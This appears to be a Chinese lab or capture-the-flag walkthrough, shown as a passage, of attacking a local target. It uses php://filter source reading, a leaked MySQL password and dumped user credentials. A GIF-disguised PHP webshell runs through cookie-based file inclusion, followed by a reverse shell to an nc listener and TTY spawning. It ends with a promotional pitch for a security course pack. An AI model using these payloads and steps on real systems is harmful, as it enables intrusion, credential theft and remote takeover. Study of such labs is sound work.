发现并不会成功
我们对该靶场进行目录扫描操作
dirsearch -u “192.168.1.4”
对config.php进行访问
发现为一片空白,没有读取出任何信息
返回到主页面
观察URL的结构,感觉他可能会存在文件包含漏洞
进行尝试文件包含漏洞
不行
既然是php,我们可以尝试使用下php伪协议
常用的php伪协议:
php://filter/read=convert.base64-encode/resource=index
php://filter/resource=index
利用filter协议读文件,将index通过base64编码后进行输出。如果不进行编码,文件包含后就会当做php文件直接执行,我们可以进行编码后复制出来,在进行解码操作
读取成功
通过base64解码,成功得到index源码
我们用同样的方法,可以读取出upload以及config的源代码
我们同样将我们得到的base64数据进行解码,并保存起来
当我们将config解码出来后,我们得到了mysql的账号密码
root:H4u%QJ_H99
在之前的nmap扫描中就知道靶场的3306端口是开启状态
进行mysql登录
mysql -uroot -h 192.168.1.4 -p
登录成功
查看下数据库中的数据
show databases;
use Users;
show tables;
select * from users;
得到了三个账号密码
将密码进行base64解密并分别进行保存
回到80端口进行尝试用得到的账号密码进行登录
登录成功,进行文件上传尝试
根据我们之前得到的upload文件源码得知
对上传文件进行了白名单尝试,只允许上传后缀为jpg、jpeg、gif以及png文件
并且对文件头进行校验
准备好一句话木马并将文件头写为GIF89a
GIF89a
<?php
system($_GET['132']);
phpinfo();
?>
保存为后缀为gif文件
尝试上传并进行bp抓包修改
上传失败
我们再次进行后缀修改,并尝试使用00截断进行上传
找到gif位置并将gif前的小数点改为00
再次进行上传
同样上传失败。。。。
查看之前获得到的index源代码
我们在该位置发现异常
在该位置未对 _ C O O K I E [ ′ l a n g ′ ] 进行输入验证和过滤:攻击者可以通过修改 \_COOKIE['lang']进行输入验证和过滤:攻击者可以通过修改 _COOKIE[′lang′]进行输入验证和过滤:攻击者可以通过修改_COOKIE[‘lang’]的值来执行潜在的攻击,例如包含恶意文件或执行任意代码。
代码解读:
isset($_COOKIE[‘lang’]):这是一个条件语句,检查名为lang的Cookie是否存在。isset()函数
用于检测变量是否已设置并且非null。
如果$_COOKIE[‘lang’]存在,代码将继续执行下一行。
include(“lang/”.$_COOKIE[‘lang’]);:这行代码使用include语句来包含一个语言文件。它使
用$_COOKIE[‘lang’]的值构建文件路径,并将该文件包含到当前的代码文件中。
获取shell:
根据该段代码的内容,我们可以构造一个名为“lang”的cookie从而造成文件包含漏洞
先正常上传后缀为gif的木马文件
上传完成后
右键下面的小图标,新建标签页面打开图像
该路径则为我们稍后构造的cookie文件包含所需要的路径
再次使用bp抓包,随便上传一个文件并修改cookie
在原有的cookie后添加
;lang=../upload/440f0eab6c78d0e3cb46c99f5d43d1b1.gif
如果使用bp上传后报错提示
Your browser sent a request that this server could not understand.
Request header field is missing ‘:’ separator.
(我在之前的测试中并没有出现过此情况,并且在之前的测试中的cookie并没有这么长,所以在该位置报错了,遂我尝试使用hackbar进行构造cookie)
可以使用hackbar进行修改cookie(在火狐的插件中可以搜索到,一个收费一个免费,我用的是免费版)
load URL:将URL地址载入到hackbar
勾选上cookies并在最后的cookie行添加上我们构造好的cookie
最后点击execute
解析成功(因为在我们上传的一句话木马中加入了 phpinfo(),用来判断该木马是否解析成功)
但是我经过测试发现好像并不能利用该木马传参进行反弹shell
所以我们我们可以尝试使用kali目录下的php shell文件或者自己写一个php反弹shell文件
木马文件在kali的/usr/share/webshells/php目录下
cd /usr/share/webshells/php
将该文件内容复制出来并做对应的ip以及端口修改
将该位置修改为kali的ip以及nc监听的端口
并将该文件后缀修改为.gif
在kali中打开nc监听
nc -lvvp 8080
将该木马进行上传
(如果使用hackbar后再次点击upload会直接跳转到之前的phpinfo解析页面,我们需要再次打开hackbar并勾选cookie,将最后的我们添加的cookie删除掉,然后重新打开文件上传页面即可)
上传木马
并同样将该文件的路径以及名称进行保存
并再次随便上传一个文件(选不选择都行,主要目的是抓包并修改cookie,所以我这里就没有选择文件,直接点击的上传),bp抓包修改cookie
;lang=../upload/f3035846cc279a1aff73b7c2c25367b9.gif
如果还是出现了报错情况,可以尝试将浏览器的缓存以及cookie进行清除
nc监听成功
我们之前获得过三个账号密码,尝试进行用户切换,毕竟该用户权限太低了
提权:
su kent
出现报错提示,我们需要重新打开一个命令交互(Spawning a TTY Shell-逃逸linux各种shell来执行命令 - lsh4ck’s Blog (lshack.cn)")在该网站中有各种shell来执行命令)
查看是否有python环境
whereis python
python -c 'import pty; pty.spawn("/bin/sh")'
可以正常使用命令交互了
切换kent用户
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。
最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。
最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!下面就开始进入正题,如何从一个萌新一步一步进入网络安全行业。
学习路线图
其中最为瞩目也是最为基础的就是网络安全学习路线图,这里我给大家分享一份打磨了3个月,已经更新到4.0版本的网络安全学习路线图。
相比起繁琐的文字,还是生动的视频教程更加适合零基础的同学们学习,这里也是整理了一份与上述学习路线一一对应的网络安全视频教程。
网络安全工具箱
当然,当你入门之后,仅仅是视频教程已经不能满足你的需求了,你肯定需要学习各种工具的使用以及大量的实战项目,这里也分享一份我自己整理的网络安全入门工具以及使用教程和实战。
项目实战
最后就是项目实战,这里带来的是SRC资料&HW资料,毕竟实战是检验真理的唯一标准嘛~
面试题
归根结底,我们的最终目的都是为了就业,所以这份结合了多位朋友的亲身经验打磨的面试题合集你绝对不能错过!